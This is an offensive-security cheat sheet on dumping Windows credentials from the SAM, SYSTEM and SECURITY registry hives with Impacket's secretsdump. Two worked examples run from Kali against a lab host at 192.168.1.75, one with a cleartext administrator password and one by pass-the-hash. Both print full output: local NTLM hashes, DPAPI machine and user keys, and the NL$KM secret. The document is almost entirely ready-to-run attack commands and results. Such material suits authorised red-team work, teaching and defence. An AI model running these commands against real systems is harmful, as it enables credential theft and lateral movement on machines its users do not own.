==================================================================================================================================
OS Credential Dumping (Registry) using 'Secretsdump'
==================================================================================================================================

Our objective is to:
- extract the password hashes of the local accounts stored in the registry hive HKLM\SAM 
  (the syskey to decrypt the registry hive HKLM\SAM is stored in the registry hive HKLM\SYSTEM)
- extract LSA secrets from registry (HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets)
- extract the cached password hashes (of domain accounts that logged on the Windows computer) stored in the registry hive HKLM\SECURITY 

A valid local or domain Windows account member of the 'local administrator' group is required copy the registry hives SAM/SYSTEM/SECURITY.

Usefull links: 
> https://attack.mitre.org/techniques/T1003/002/
> https://attack.mitre.org/techniques/T1003/004/
> https://attack.mitre.org/techniques/T1003/005/

Impacket's secretsdump (python script) can be used to dump SAM and LSA secrets, either remotely, or from local files. 
For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).
> https://github.com/fortra/impacket/blob/master/examples/secretsdump.py


==================================================================================================================================
Example 1. Use 'Secretsdump' to remotely dump the Windows password hashes, cached passwords and LSA secrets stored in the registry
           hives of a target Windows computer using local admin credentials (login/password)
==================================================================================================================================

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump administrator:Welcome2023@192.168.1.75    
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x59872b224354bef6b98aaf28e3011ab8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fabc0bc2b69879b2bcd0a32ae82e55b9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc312568f7f7c6cd71cb0e5798ff23ce14cd7a5a3
dpapi_userkey:0xbb7efed59c051f93af5d0ac45a8604725310c6cf
[*] NL$KM 
 0000   2C CD E3 46 98 A0 3D 80  F9 F6 22 53 9B C0 D3 A9   ,..F..=..."S....
 0010   0F 80 EF 0C CF 4F 39 B4  A5 83 F9 2C AA 39 20 D4   .....O9....,.9 .
 0020   5F 42 3F 0B E4 B8 5B 54  C0 96 C7 2E B0 72 57 40   _B?...[T.....rW@
 0030   BB 07 0A F7 1E 08 DF 03  10 AD 5A CC 84 50 D8 2A   ..........Z..P.*
NL$KM:2ccde34698a03d80f9f622539bc0d3a90f80ef0ccf4f39b4a583f92caa3920d45f423f0be4b85b54c096c72eb0725740bb070af71e08df0310ad5acc8450d82a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
             

==================================================================================================================================
Example 2. Use 'Secretsdump' to remotely dump the Windows password hashes, cached passwords and LSA secrets stored in the registry
           hives of a target Windows computer using local admin credentials (login/hash)
==================================================================================================================================

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:fabc0bc2b69879b2bcd0a32ae82e55b9 administrator@192.168.1.75 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x59872b224354bef6b98aaf28e3011ab8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fabc0bc2b69879b2bcd0a32ae82e55b9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc312568f7f7c6cd71cb0e5798ff23ce14cd7a5a3
dpapi_userkey:0xbb7efed59c051f93af5d0ac45a8604725310c6cf
[*] NL$KM 
 0000   2C CD E3 46 98 A0 3D 80  F9 F6 22 53 9B C0 D3 A9   ,..F..=..."S....
 0010   0F 80 EF 0C CF 4F 39 B4  A5 83 F9 2C AA 39 20 D4   .....O9....,.9 .
 0020   5F 42 3F 0B E4 B8 5B 54  C0 96 C7 2E B0 72 57 40   _B?...[T.....rW@
 0030   BB 07 0A F7 1E 08 DF 03  10 AD 5A CC 84 50 D8 2A   ..........Z..P.*
NL$KM:2ccde34698a03d80f9f622539bc0d3a90f80ef0ccf4f39b4a583f92caa3920d45f423f0be4b85b54c096c72eb0725740bb070af71e08df0310ad5acc8450d82a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

